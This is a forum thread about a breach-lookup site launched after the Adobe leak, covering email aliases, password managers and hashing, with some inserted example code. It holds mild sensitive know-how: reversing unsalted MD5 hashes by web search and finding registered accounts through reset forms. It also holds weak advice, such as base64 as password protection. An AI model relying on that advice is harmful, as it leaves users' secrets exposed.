California is one of the few (only?) states with privacy laws, and it basically just says companies must post a privacy policy and follow it - and that policy could, for example, say they are allowed to sell on your information, which I'm sure 99% of companies would opt for.

Your e-mail address alone is not worth much in a general sense. In terms of spammers, they already have all the e-mail addresses in this list. And if on the off chance this guy's service is "selling" e-mail addresses to spammers (at what... $0.10 per e-mail address?), are you really so afraid of someone sending you spam?

[1] https://en.wikipedia.org/wiki/Information_privacy_law#United...

For more information about all the other personal information about you that isn't private, see https://epic.org/privacy/profiling/

Hi, two things.

People knowing that you have an account yyy@example.com at example.net could use that information in a spear-phishing attack, or know that you're involved in a controversial website, prohibited website, etc.

Emails were not the only things that were stolen. For example, in the Adobe breach, encrypted passwords were stolen. If your email address is shown as being in the Adobe breach, that also means that your encrypted password, password hint, etc. were stolen. For Sony, maybe credit card information.

If this website was only about whether email addresses were leaked, then why would anyone type in their email address into this website (thus leaking your email)?

I'd prefer not to use this site since, if I'm affected, it signals to whoever owns the site that I'm a live person whose accounts might be worth probing.

OTOH, California was the first of many US states to require disclosure or notification of personal information security breaches,


and will soon be requiring disclosure of breaches of "personal information that would permit access to an online or email account"


Normally wouldn't trust this, but:

http://www.troyhunt.com/

http://www.intodns.com/haveibeenpwned.com (forwarded from haveibeenpwned.azurewebsites.net)

http://www.whois.com/whois/haveibeenpwned.com

Seems legit.

Troy Hunt has been blogging about this for a while. Troy is a good guy who blogs extensively on security matters. I don't see any risk in putting your details in here.

His recent posts on pwning people's phones and tablets while they were at his conference talk are pretty amusing. Shows just how insecure things really are.

As someone who was 'pwned' by the Adobe leak, I have no idea how bad the pwnage was. That is, I don't recall what my Adobe password was, and so I have no idea which of my many passwords was compromised.

Also, I partially went through the Adobe password reset procedure two or three times--each time guessing at what my original password was. Unfortunately, they accepted all of my guesses, so I was still none the wiser about which password was compromised.

To top the entire ordeal off, Adobe was not the one to tell me that my password was compromised. Instead, my hosting provider and some other services notified me.

Yeah, I'm downloading the leak and trying to check if I can deduce whether it was the common I-don't-care password I think it was. A couple other people had used the same password, but the hints didn't help me.


> I don't recall what my Adobe password was

This will tell you your password hint (and if any other user had an identical password, you will see their hint also). https://lastpass.com/adobe/

Same boat. Don't remember if it's an email/password combo I still use.

I tend to create a new email address for everything I sign up for. This makes it a little harder to check :)

EG: twitter@example.com, facebook@example.com, hackernews@example.com

It also makes it a little harder for people to find me on social media. Not sure if that's a bug or a feature ;)

That's actually a very unadvisable scheme. By doing this you make yourself a target. If any one of those are compromised, attackers will attempt to try that against a lot of popular sites (including banks). If you have your own domain (which I assume you do based on your scheme), I suggest not doing this. You would be better off coming up with a random account name for each and using a password manager to keep track of these.

FYI, I used to do this too. And this is how (in a similar fashion) Mat Honan got Gizmodo's Twitter and his iCloud and Gmail accounts hacked and also had his computer remotely wiped because he used his name in every domain/service as his account name or email account name.

Edited for more information.

The key motivation is not security, but if any account starts receiving spam, I will have a good idea where it is coming from. It also lets me shut off mail from any source.

Some services will use that as the username, others allow me to pick my own. Using a password manager helps this whole scheme. Now that I do that, I could go to random email addresses and usernames.

The only problem I've found with this method is the spammers that try to guess your email, so they end up sending emails to "admin@domain.com", "webmaster@domain.com", etc. The catch-all forwards them all to me.

The only way around this, I think, is to only have uncommon emails, like instead of admin@domain.com, use contactadmin@domain.com. Put a block on the common ones and you're good to go.

It's not that spammers try to guess your email, but that if you accept any email address as valid they'll notice that you are accepting delivery.

Once I figured this out I just created wildcard aliases that end with a static prefix: netflix-blah@example.com, adobe-blah@example.com, etc. This cuts down on 99% of the random spam.

Regrettably this is against RFC 2142 [1], which states that you need to leave certain mailboxes open (such as abuse@domain, webmaster@domain, etc.)

[1] - http://www.ietf.org/rfc/rfc2142.txt

Quite ironic, isn't it, how "abuse@example.com" is a conduit for abuse?

Spammers effectively killed that RFC.

>By doing this you make yourself a target. If any one of those are compromised, attackers will attempt to try that against a lot of popular sites (including banks).

And if you use the same email for everything (as is the alternative), attackers can attempt to try that against popular sites. So I don't see the downside of this method?

The real key is to not use the same email address across accounts. If you have your own domain, then it's easy.

I actually don't like the idea of using email addresses as user IDs. I believe that was a lazy approach in the first place and it causes too many problems. I'm sure it all started that way because someone wanted your contact info, and the only way to guarantee a valid email was to make you verify it. It has nothing to do with security.

Nobody said security was easy or convenient.

Anyway, to each his own. I have my own domains and do, unfortunately, have about 100 email addresses/aliases. Yeah, it can be inconvenient to maintain. I originally started using the aliases because I wanted to know who was giving out my email to spammers. I caught a few and stopped doing business with them.

If someone is directly targeting you, then yes it's an issue (but even so, it's less of an issue than using exactly the same email address for all of your accounts).

In a mass compromise like the Adobe one, it's highly unlikely that the hackers are going to go out of their way to attack people who use this method when there's millions of much easier targets already in their list.

Using this approach also makes it a lot easier to spot spam - if I get an email to "hackernews@myaccount.com" claiming to be from my bank, it's highly unlikely to be genuine. If it's coming to "mybank@myaccount.com", there's at least a fair chance that it's real - I still treat it with a fair amount of caution, but as I've filtered out the obvious junk I can spend more time checking out these reasonably genuine-looking ones. Using a random email like hhj4378@myaccount.com would make this quick filtering a lot harder.

The downside is that using random accounts on your domain requires a catch-all email rule on your server (unless you add each address by hand, but frankly that's too much of a hassle).

I never use a catch-all. Deleting email would quickly exceed available time.

I go through the trouble of creating a new email each time. I've considered writing a script to make it easier, but my current mail provider makes that difficult.

catchall FTW

I follow the following pattern with websites:

If the website is important (ex. government), I use <sitename><4_numbers>@<private_domain>. My filtering rules are extremely strict, and every mail that doesn't come from the expected website gets automatically flagged as spam and deleted. If their DB leaks, I just change the 4 numbers.

If I know the website and it's not a startup, I use <sitename>@<public_domain>, ex. facebook@example.com. My filtering rules only flag the messages as "maybe spam" when the sender is not in my contacts. If their DB leaks, I change the filter from "maybe spam" to "spam".

If it's a website I don't know, or a startup, I use <full_domain>@<public_domain>, ex. mystartup.io@example.com. I don't filter them, but if I start getting spam, I just simply set the email as an alias to my wormhole (an account I never check that flags anything it receives as spam).

If it's a spam blog, or a website that forces me to create an account for no apparent reason, I just use the wormhole address.
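The four-tier alias scheme above, written out as a small filter policy in Python. This is an added example, not the commenter's own rules; the domains, aliases and sender addresses are constructed placeholders, and the "DB leaked" transitions follow the comment (new digits for tier 1, "maybe spam" to "spam" for tier 2, wormhole for tier 3).

```python
import re
import secrets


class AliasPolicy:
    """Mail filtering for the four alias tiers described above.

    Tier 1: <site><4 digits>@private_domain; only the expected sender domain
            is accepted and after a leak the 4 digits are changed.
    Tier 2: <site>@public_domain; "maybe spam" unless the sender is a contact,
            and after a leak the alias is flagged as spam outright.
    Tier 3: <full_domain>@public_domain; unfiltered, and after a leak it is
            aliased to the wormhole, whose every message is spam.
    All domains and addresses in this example are constructed placeholders.
    """

    def __init__(self, private_domain, public_domain, wormhole_local="wormhole"):
        self.private_domain = private_domain.lower()
        self.public_domain = public_domain.lower()
        self.wormhole = f"{wormhole_local}@{self.public_domain}"
        self.important = {}        # tier 1 local part -> expected sender domain
        self.known = set()         # tier 2 local parts
        self.leaked_known = set()  # tier 2 aliases whose site DB leaked
        self.wormholed = set()     # tier 3 aliases redirected to the wormhole
        self.contacts = set()      # full sender addresses that are trusted

    @staticmethod
    def _split(addr):
        local, _, domain = addr.strip().lower().rpartition("@")
        return local, domain

    def register_important(self, site, sender_domain, digits=None):
        """Create a tier 1 alias; the digits come from the OS CSPRNG unless given."""
        if digits is None:
            digits = f"{secrets.randbelow(10000):04d}"
        self.important[f"{site}{digits}"] = sender_domain.lower()
        return f"{site}{digits}@{self.private_domain}"

    def register_known(self, site):
        """Create a tier 2 alias for a site I already know."""
        self.known.add(site.lower())
        return f"{site.lower()}@{self.public_domain}"

    def on_leak(self, alias_addr):
        """Apply the per-tier response once the site behind an alias leaks."""
        local, domain = self._split(alias_addr)
        if domain == self.private_domain and local in self.important:
            site = re.fullmatch(r"(.+?)(\d{4})", local).group(1)
            return self.register_important(site, self.important.pop(local))
        if local in self.known:
            self.leaked_known.add(local)   # "maybe spam" becomes "spam"
        else:
            self.wormholed.add(local)      # tier 3: route to the wormhole
        return alias_addr

    def classify(self, rcpt, sender):
        """Return "inbox", "maybe spam" or "spam" for one incoming message."""
        local, domain = self._split(rcpt)
        sender = sender.strip().lower()
        sender_domain = sender.rpartition("@")[2]
        if f"{local}@{domain}" == self.wormhole or local in self.wormholed:
            return "spam"
        if domain == self.private_domain:
            # strict: anything not from the registered sender domain is dropped
            return "inbox" if self.important.get(local) == sender_domain else "spam"
        if domain != self.public_domain:
            return "maybe spam"
        if local in self.known:
            if local in self.leaked_known:
                return "spam"
            return "inbox" if sender in self.contacts else "maybe spam"
        if "." in local:
            return "inbox"      # tier 3: <full_domain>@public, not filtered
        return "maybe spam"     # an alias this policy never handed out
```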

This seems way too difficult to manage.

I wish there was a Gmail-like application that anyone could set up easily on their server and that would allow for quick email generation.

You need to sign up to something? Generate a quick mail that redirects automatically to your main inbox and that you can give away when signing up.

If you see that spam is arriving on this email, remove it.

baby+hackernews12345@gmail.com goes to the inbox of user baby.

I already know this trick and don't use it because:

* it's easy to get the real email address from it.

* most sign-up forms don't accept the "+" sign.

That seems like a lot of overhead to manage. Also, you're going to have a bad day if a spam bot decides to spam thousands of <common_user_name>@yourdomain.com. Maybe that's fallen out of practice, but I've seen it happen before.

Not really; this year I have changed only 1 filter. The initial setup may be cumbersome, but the end result is worth the effort.

And about the spam to random addresses, in 8 years the most extreme problem I had faced is spam to censored addresses like git...@domain.com (thanks google code).

It's a tried and true spamming tradition and it's going strong. I see plenty of entries like

    Envelope-to: <eba615c3c@my.domain> 
in my reject log. Addresses that were never used anywhere. Some things just refuse to die.

This is brilliant, thanks for sharing.

Same here, with completely randomized passwords 60 chars long and different emails. IM INVISIBLE!

60 chars passwords probably reach the char limit imposed by many different services.

Might not want to give away your exact password length publicly.

Considering that's 394 bits of entropy, I think rfnslyr might get away with it.

unless it's >= 60

Don't worry, it was yet another trick.

How many proxies are you behind? :)

Who's to say these guys aren't stealing our emails?

They don't need to steal if you publish your email address yourself wfunction... http://comments.gmane.org/gmane.comp.lang.d.general/86923

I don't appreciate you stalking me and posting that here (just because it's accessible somewhere on the internet doesn't mean I want to make it more public), but as a matter of fact I wasn't talking about that email address in the first place.

your email is not a secret.

No, but it can be harvested for directed attacks or spamming. Entering it would basically 'prove' it's a valid address.

The Adobe leaks list is mostly made up of verified emails, so...

Coming to think of it, there has been some spam lately (though that hasn't happened in years now at gmail), and I wonder whether it's related to that Adobe leak.

Ah, but by checking if your email is compromised, they get even more emails than they did just from compromised sources.

On a risk / reward basis the benefit to checking here is actually pretty high.

I don't find any of several accounts I use on there, but did find a friend's email listed (and just notified him). I'd actually appreciate a way to query my mailing list in an automated fashion.

Did your friend have an input on the risk/reward decision?

It's the same reason why you don't reply to spam; it confirms your email is valid. http://www.pcmag.com/article2/0,2817,2376031,00.asp

That's been the conventional wisdom for decades, but I don't actually think it's true. I wonder if anyone has done any tests.

The reply address for spam is almost certainly bogus. And I don't think it makes sense to target people who unsubscribe for more spam. They ain't likely to buy anything.

The geolocation part of that advice is a little paranoid for webmail users.

Secret, probably not. But in most cases I'm reasonably confident that each email address I use is currently only known by me, the one site I registered it with and the NSA.

I have a couple of email addresses that thanks to that address either having been sold, hacked or given away by including in the to/cc field of a mass mailing are now out in the public domain, and I get spam (and almost certainly malware attempts) on those two on a pretty regular basis. I'd prefer to not have the rest of my email addresses end up in the same situation.

Well, if you decide to list it under your HN bio, then obviously, it's not :)

But it's not public information either, unless you choose to make it public.

But it's a real email.

You can't steal somebody's email just by knowing their address.

If you wanted to collect likely-valid email addresses to sell to spammers, this would be a good way to go about it. I doubt they are, but can understand the suspicion.

They already have 150M+ valid email addresses from the breach if they wanted to spam people.

I doubt they are too, but they should be really proving it somehow.

Did you mean to ask 'are they harvesting our emails?'.

Have you been pawned? Yes, now that you just gave us your email address to sell to Russian hackers.

Am I the only one who is reminded of the "Has your credit card number been stolen? Check here!" phishing ads?

Isn't there a better way to check for stolen addresses than to enter your email on a dodgy (hey, I followed a link on Hacker News) website? Such as calculating a hash on the client, and sending the hash for verification?

This is an impressive service (the speed, especially)...collation of different data sources into one easily accessible form is a hugely useful and underrated service. That said...there's no such thing as better security without an equal tradeoff. Here, it's now much easier (especially with the site response speed) for a third party to look up email addresses, see who they've patronized, and aggregate them into a database of less noble intent.

To check if a given email address was an Adobe/Gawker/whatever customer, you would've not only had to query every separate form but you would also not be guaranteed to get a definitive response (because some services will be ambiguous to whether you got a password wrong or whether the account exists at all). With the OP's service, with positive hits, you not only get confirmation of patronage, but knowledge that they are vulnerable, even if in a small, outdated way.

It's likely something Troy has anticipated but didn't want to outright say...In the end, knowledge is better than ignorance, and the correct response is for more rapid response to hacked victims and better security awareness. But I also wonder if there's a way to provide the OP's service with more (beneficial) obfuscation?

I disagree with your thesis; anyone with malicious intent can be assumed to already have their own copy. Even the Adobe dump is under 4gb compressed - a trivial amount of storage.

Additionally, there is a huge long tail of publicly available user databases that are not included in this site, which along with the lack of hashes makes it worthless for the purpose you envision.

It's also extremely easy to tell if an email is registered on a website if you aren't concerned about the victim being notified. You just need to attempt to either reset the password (it'll say whether the email exists) or register a new account with their email.

Whoa, slow your roll buddy. This could be really easily done by preprocessing the data and creating simple objects in redis. One object = email, sub objects of email could just be flags for the service it's on.

It's not the processing that's the bottleneck, it's the gathering and the initiative to do that gathering which is rare. For example, criminal records and notices have always been collectable and, once collectable, searchable. But the incidence of "a prospective employer googled me and found a 5 year old article of me publicly urinating in college" became more of an issue in the age of Google.

This isn't an indictment of Troy at all, just an observation (and I'm also just curious about what mitigation could be done, if any, that wouldn't severely inconvenience the end user). The security that exposed people had was security through obscurity, which is in the end, not enough security.

Mitigation would be fairly simple: instead of a web form, put up an email address that you can send a message to and get back the result.

For the last 12 years or so I've been using unique email addresses. I have a catchall domain and established patterns for giving out email addresses. Over the years I've witnessed many companies either getting hacked or selling out their mailing list. I know this because I start to receive spam to these unique email addresses.

Just this morning I discovered that Sirius XM has been hacked. Shame.

It would make an interesting project to analyze all this history that I've built up.

I am in the habit of making up email addresses on the fly when I register for things. Looking in my spam folder, in the last couple of days I've had spam to the email addresses I submitted to Adobe, Groupon and Abbey National Bank (now Santander). As people have pointed out email addresses are not secret, but if they've leaked out of these businesses' databases it's a bit worrying what else they might be leaking.

Should I Change my Password is a push service which notifies if your account is compromised and sends you an e-mail to change your credentials [0].

Cool hack btw! The only thing missing is a "What to do" link which could be more useful for folks who are not so technically savvy.

[0] https://shouldichangemypassword.com/

Does anyone know the site that lists all the sites that have been compromised?

Edit: Found it, this was the one I was looking for. http://dazzlepod.com/disclosure/

I've started to sign up to sites with a unique email address based on the website's URL.

E.g. If I signed up to Myspace I would use Myspace@exampledomain.com

I have the mail server at "www.exampledomain.com" set to accept all emails under the domain so I can see if someone has passed on my details legitimately or via hacking.

Since I've started about 12 months ago I've not found any cross pollination which seems a good sign for the industry in general.

It also adds a layer of security as your sign-up email changes for different websites if you use the same password across several.

Is this a clever way to harvest email addresses? :)


    Passwords: I’m not storing them. Nada. Zip. I just don’t need them 
    and frankly, I don’t want the responsibility either. This is all 
    about raising awareness of the breadth of breaches.

Considering that this is made by Troy Hunt, I would trust it. He has built up enough reputation in my mind.

They should have instead used digest to store and transfer the email addresses.

I have a question...how big is the backend to this site? Its average response is about 100ms, which, to me, seems impressively fast considering the number of bulk records and the amount of concurrent traffic that such a site is getting. Besides the obvious indexing of the email field...anything special behind the curtains? Lots of machines? Something else besides a simple key lookup? Or am I just vastly overestimating how slowly a properly maintained DB will respond in such a situation?

He discusses a little in the intro post[1], but indicates he'll be writing a technical detail post too.

[1] http://www.troyhunt.com/2013/12/introducing-have-i-been-pwne...

I think you are overestimating. This is not so large and unique key searches are blazing fast in pretty much any DB under the sun.

This might answer your question: haveibeenpwned.com/HowFastIsAzureTableStorage/?email=foo@foo.com

I'm writing up how the back end is done and will post it in the next day or two, IMHO it's massively impressive but also very easy :)

Looking forward to it! The raising of awareness about security is alone pretty awe-inspiring, so the fact that I'm equally piqued by such technical details as the site's backend is really saying something about the impressiveness of the execution.

The email I used for Adobe was caught in their breach. Good news? I not only used a different password, but I use a new email for almost every site. I have a wildcard email and Adobe is the only site I've ever used that particular email on. Meanwhile, my yahoo account (which I basically use for nothing) is not listed as being exposed, but I logged into that recently and had a note that it had recently been logged into from India. Good golly.

That Adobe got hacked isn't your fault - that you chose a weak password and reused it, is.

Showing a few more numbers might help more people realize that their passwords aren't actually unique, creative or safe. The data that came out of the Adobe hack is pretty interesting, and the results are much more tangible than "oh no, pwned!".

Something like:

"Your password was used by 8290 people.

Furthermore, 2615 persons gave a plain text hint as to what the password might be."

"How to collect e-mail addresses" - Exercise 1

Feature request: Could you strip the dots from user input if the email address is @gmail.com, and similarly strip the dots from the records of pwned email addresses? Gmail usernames are dot agnostic, and I sometimes use xyz@gmail.com, x.yz@gmail.com, etc. This makes it hard to use the tool to check if my Gmail has been pwned. (Also, I assume you don't do this already).
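One way to implement the dot-insensitive Gmail matching requested above, as an added example that is not the site's code. The breach records are constructed, and the normalisation goes a little beyond the request: it also folds the "+" suffix mentioned elsewhere in the thread and the googlemail.com alias, which deliver to the same mailbox.

```python
# Constructed sample of breach records: (address as it appeared in the dump, breach)
RECORDS = [
    ("x.yz@gmail.com", "Adobe"),
    ("XYZ@googlemail.com", "Gawker"),
    ("xyz+newsletter@gmail.com", "Sony"),
    ("x.yz@example.com", "Adobe"),
]

GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def normalize_email(addr):
    """Canonical form so that two spellings of the same mailbox compare equal.

    Gmail ignores dots in the local part and everything after a "+", and
    googlemail.com delivers to the same mailbox as gmail.com. For other
    domains only case is folded (local parts are case-sensitive per RFC 5321,
    but in practice no large provider treats them that way).
    """
    addr = addr.strip().lower()
    local, at, domain = addr.rpartition("@")
    if not at or not local or not domain:
        raise ValueError(f"not an email address: {addr!r}")
    if domain in GMAIL_DOMAINS:
        local = local.split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def breaches_for(query, records=RECORDS):
    """Names of breaches whose stored address is the same mailbox as the query."""
    key = normalize_email(query)
    return sorted({breach for addr, breach in records if normalize_email(addr) == key})
```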

This is what caused me to start using a password manager. I always knew that I should, but it seemed to be a major pain; if I had known how convenient it is, I would have switched to it long ago.

Instead I first started off with my own "password generator":

    import secrets
    import string
    import sys

    # "simple" = letters and digits only (used for usernames); otherwise
    # every printable ASCII character except whitespace.
    SIMPLE_CHARS = string.ascii_letters + string.digits
    FULL_CHARS = SIMPLE_CHARS + string.punctuation

    def generate_random(length, simple):
        chars = SIMPLE_CHARS if simple else FULL_CHARS
        # secrets.choice draws from the OS CSPRNG; the random module is
        # not suitable for generating passwords.
        return ''.join(secrets.choice(chars) for _ in range(length))

    def username():
        return generate_random(length=4, simple=True)

    def password(length):
        return generate_random(length=length, simple=False)

    if __name__ == '__main__':
        length = 6
        if len(sys.argv) > 1 and sys.argv[1].isdigit():
            length = int(sys.argv[1])

        for _ in range(20):
            print(username(), password(length))

I'd like to see a site which validates whether or not your password is exposed. Users should assume that it is exposed, but it would be nice to know whether or not it's floating around in some list somewhere.

Problem is, I can't think of a computationally efficient way to perform this check securely. I could see handing the user a nonce, asking them to manually hash their password concatenated with the nonce, and then comparing the user's response with a list you've hashed yourself, but I'm sure this won't scale well.

Is there such a thing as a secure, or "blind", bloom filter which allows a user to search for some chunk of text without exposing to the world what that chunk of text is?

Edit: Hmm, this might be what I'm looking for: http://www.tdp.cat/issues/tdp.a015a09.pdf
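The nonce-and-hash check sketched above, as an added example that is not part of the original comment, with both the client and the server side. The leaked password list is a constructed sample, SHA-256 stands in for whatever hash the service would use, and the work counter makes the per-query cost the comment worries about visible.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for a dump of leaked plaintext passwords.
LEAKED_PASSWORDS = ["password", "123456", "foobar", "letmein", "qwerty"]


def nonce_hash(nonce, password):
    """H(nonce || password); SHA-256 is an arbitrary choice for this example."""
    return hashlib.sha256(nonce + password.encode("utf-8")).hexdigest()


class LeakCheckServer:
    """Holds the leaked list and answers one nonce-bound query at a time."""

    def __init__(self, leaked):
        self.leaked = list(leaked)
        self.outstanding = set()   # nonces issued but not yet used
        self.hashes_computed = 0   # work counter, to show the per-query cost

    def issue_nonce(self):
        nonce = secrets.token_bytes(16)
        self.outstanding.add(nonce)
        return nonce

    def check(self, nonce, client_digest):
        """True if the digest matches any leaked password under this nonce."""
        if nonce not in self.outstanding:
            raise ValueError("unknown or already used nonce")
        self.outstanding.discard(nonce)   # one-time use: a query cannot be replayed
        found = False
        # Every leaked password has to be re-hashed under the fresh nonce, so the
        # server does len(self.leaked) hash operations for every single query.
        # That linear cost is the scaling problem the comment above expects.
        for leaked_pw in self.leaked:
            self.hashes_computed += 1
            if hmac.compare_digest(nonce_hash(nonce, leaked_pw), client_digest):
                found = True      # keep going: same work whether or not it hits
        return found


def client_check(server, password):
    """Client side: obtain a nonce and send only H(nonce || password)."""
    nonce = server.issue_nonce()
    return server.check(nonce, nonce_hash(nonce, password))
```

The nonce stops the server, or anyone watching the exchange, from matching the digest against a precomputed table, but the digest is still open to an offline dictionary attack by whoever sees it, so a weak password is not protected by this scheme.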

It's possible to write a tool that will figure out all algorithms/salts used by compromised sites, and then hash your password with those algorithms/salts and see if that hash appears in the compromised password files.

Most of the compromised sites use worthless password storage mechanisms, like unsalted hashes or plaintext, so this level of sophistication is mostly unnecessary. For example, say you used the password "foobar".

md5 that:

    $ echo -n "foobar" | md5sum
    3858f62230ac3c915f300c664312c63f  -
Then Google for 3858f62230ac3c915f300c664312c63f. The first result's snippet is:

    = rainbow.lookup('3858f62230ac3c915f300c664312c63f') # => 'foobar' ...
There you go. Don't use "foobar" as your password.

You've got me thinking about how I store passwords. I have in the past done:

    ~ $ echo -n "mypassword" | base64
How would one combine the above with md5? On OS X, is it `md5 -s <string>`?

So basically base64 'mypassword', then md5 the base64 result.

Well, I wasn't joking, but I didn't realize md5 was as vulnerable as Atwood says it is. SHA-2 or Bcrypt.

Sorry, that was overly snarky and that wasn't warranted.

Are you talking about how you store your own passwords so that you may retrieve them in order to log into some service, or are you talking about how you store user credentials as part of an application?

If you're storing your own passwords, just use a well-rated password locker program, or store them in a TrueCrypt volume or similar. If you're storing your users' passwords... well, don't -- store the hash like that Atwood article suggests.

To your initial question, if you need to use the output of one program as an argument to another program, you can wrap it in backticks:

    md5 -s `echo -n please_dont_actually_do_this | base64`
But really there's no benefit to converting it to base64 before you hash.

No, I am just storing my passwords in a text file and I don't want to do it in plaintext, but I also don't want to have to encode the whole text file and decode it first to use it. Just make it more complicated if someone opens it.

Thanks for the reminder of ticks (`) I was accidentally using single quotes (')

Ah, then I stand by my original advice. Keep in mind, base64 encoded ascii/UTF-8/whatever encoding you like is still plaintext. If you want to be secure, use a password locker program or store them in a text file inside of a small encrypted volume which you unmount as soon as you're done with it (TrueCrypt is nice for this).

But if you don't care about them actually being secure, party on...

Aside from backticks, you can also use the dollar quote (I'm sure this has a better name):

    $(some_command some arguments | some_other_command)
Finally, back to the original "how do I combine this with md5" question, you don't, as that won't do what you want. That is, you want to be able to recover the plaintext, but cryptographic hashes are designed specifically to make that practically impossible.

Nothing wrong with md5 itself here, just the way it's being used.

If you replace it with sha-2 you'd have the exact same problem (bcrypt is more than a simple hash function).

Many comments suggest to use password managers like lastpass, 1pass, etc. But I think that may not be a good idea: a. What if lastpass/1pass is compromised? b. You have to login to retrieve your password, which is inconvenient.

I think the best solution to this is to make sure your passwords ONLY exist in your head, nowhere else. And to NOT reuse your passwords, you have to create a unique and reasonably strong one for each service.

So how do I remember all these unique and strong passwords? I create an algorithm which takes two parameters as inputs: my username and the domain of the service, it will do some simple manipulation of the inputs and give me a reasonably strong password. Hence, all you need to do is to remember your algorithm and use it to compute your password when you need it. Of course, you want the algorithm simple enough to be done in your head.

Cases like these are why you should NEVER use the same password on different sites. While my email is in the Adobe list, the password I used there is unique, so I don't bother too much, other than that I've lost any trust in Adobe and I'll think twice about doing any business with them in the future.

I got an email from LastPass about being caught up in the Adobe breach and it took me one evening, two cups of coffee, and a lot of patience to switch all my passwords to auto-generated strings and enable 2-factor where I could.

Only now in this fleeting moment do I realize that I'm now tied to LastPass's ecosystem.

Feature request: allow wildcard searches, with a sufficiently large literal starting prefix, to return a simple "zero" or "more-than-one" result.

EG: "john*@gmail.com"

I'd then feel better about typing my address into a random site, and be able to check site-specific variants of my address more easily.


For every different site I use a different email address, so I know when something fishy is going on. So I might have hackernews@mydomain.com. The form won't accept just @domainname.com :(

Also, for those of us that use aliases for each site we visit... it would allow a quick lookup of them.

Nice, I've been looking for a tool like this, so I don't have to download each of these hack lists.

This database includes emails that were simply listed in these data breaches. Newer Adobe account emails were put in as entries in the database, but their associated password/hint data was not. There were quite a large number of these in the leaked db, including some of mine. I had to download the whole thing and search to realize that the only information revealed/stored was the email address.

Idea: Write a service that you pass the unsalted hash to (only salted hashes in the DB please), and the email address and hash type. Stop people if their hash matches any previous ones.

Obviously this would stop people providing the same password for all services... But might creep some people out!

Would hopefully highlight how insecure/guessable non salted hashes are. Does anyone know best practice for doing things like this?
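On the "best practice" question above, an added illustration (not the commenter's service and not Adobe's scheme): with an unsalted hash, two users who chose the same password get the same digest, which is exactly what lets a leaked table be grouped and matched against precomputed tables; a per-user random salt plus a slow KDF (PBKDF2-HMAC-SHA256 here) removes that property. The iteration count is an assumption to be tuned per server.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Assumption: tune so one hash costs roughly 100 ms on the login server.
PBKDF2_ITERATIONS = 200_000


def unsalted_hash(password: str) -> str:
    """The weak form: every user with this password gets the same digest."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted, slow hash. Store both the salt and the digest per user."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Recompute with the stored salt; constant-time compare avoids timing leaks."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)


def unsalted_digests_collide(pw_a: str, pw_b: str) -> bool:
    """True when two accounts would be linkable in a leaked unsalted table."""
    return unsalted_hash(pw_a) == unsalted_hash(pw_b)


def salted_digests_collide(pw_a: str, pw_b: str) -> bool:
    """With independent salts, identical passwords no longer share a digest."""
    _, digest_a = hash_password(pw_a)
    _, digest_b = hash_password(pw_b)
    return digest_a == digest_b


if __name__ == "__main__":
    # Constructed demonstration: the same weak password for two users.
    print("unsalted collide:", unsalted_digests_collide("123456", "123456"))
    print("salted collide:  ", salted_digests_collide("123456", "123456"))
    salt, stored = hash_password("123456")
    print("verify ok:", verify_password("123456", salt, stored))
```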

And let's also not forget, this is why you should always use http://www.mailinator.com/ instead of your real address.

Lots of sites block mailinator, but then use one of their aliases – foobar@spamgoes.in ... then check http://foobar.mailinator.com/

Is this a trap to build a mailing list?

I tried a bunch of fake hotmail emails and 90% of them are "pwned". Very suspicious to say the least.

Aside from those who enter fake addresses or addresses they do not control, the folks who set up websites like this can also connect each email address with an IP address. This might be useful, e.g., for determining geolocation. It is sad to think that naive users are falling for this every time a data breach makes the news, handing over their email address to total strangers.

This sounds as much of a trap as the websites that tell you "how secure is your password" do, using them to build dictionaries for brute force.

Welp, I now know my login was a part of the Adobe leak.

Shouldichangemypassword.com sent me an email a few weeks ago saying my email address was found in a leaked database, although they couldn't say which one. Considering I have more than 100 accounts which use that particular email address, it didn't help at all. This site did!

Is it possible to apply the same hash function to a string as is done in the users database of the Adobe breach? I think it is 3DES. I've been able to obtain my (hashed) credentials, but it seems my account is deactivated at adobe.com (probably due to inactivity?), so I'm not able to test which password I used. :(

The key is not publicly known. Some passwords have been recovered, as discussed here:


It would be irresponsible for anybody to share the key, it would reveal all the passwords.

I got my Adobe account pwned, apparently.

I didn't even know I had an Adobe account, I don't use any Adobe products.

Weird. Flagged a hotmail addy I rarely use as having been compromised in the Adobe breach, but I don't recall ever using that address with Adobe and when I plug it into Adobe to reset the password for it, it says that they have no account associated with that address.

This site has done a good job highlighting just how badly Adobe screwed up with their data breach. Everyone in my office had their email address show up from the Adobe breach (including mine) and based on the comments, everyone else mostly did as well. Whoa.

This is a great service -- I've already shared it with my colleagues. But doesn't this tool now make it easier for those with a grudge to find their enemies' compromised accounts? ...all the more reason to change your passwords...

I always have an uncomfortable feeling these exist purely to harvest email addresses. Not that it stopped me using it, the results are of interest and my email address is already plastered all over the place.

My gmail was fine but my yahoo mail is compromised, but I actually changed the password a couple weeks back because yahoo asked me, so it worked out fine. I have not used Adobe's services for over a year now.

You suck Adobe.

It looks like the guy having mark@facebook.com has an Adobe account!

Seems pretty similar to this one from a year or two back...


For some reason I always forget I have an Adobe account.

Funny that example@example.com has been pwned twice.

example.com is a special domain, not to be used for any legit purpose, so good luck hacking that!


I'm aware, that's why I wanted to see if people were using it for their accounts.

john@doe.com and fuck@off.com can beat that - pwned three times each. See also noneofyour@business.com.

I find it amusing that my real email address is not compromised but all of my fake ones for signing up for various things are compromised.

Is it possible to find the actual data? I found an old email in there, would be interesting to check out what lame hint I used.

It says I haven't, yet if I google my email and an older password I used to use, I find it listed on some Russian forum.

You should also include dates alongside the breach, just so that one knows if they have taken corrective action after that.

For cases like these are why you should NEVER

Never finish your comments?

Adobe got me.

Does lastpass work great for checking banking on cellphones and other logins that would require a cut and paste on a desktop?

I use lastpass on my android phone. I use 2 factor with an nfc yubikey.

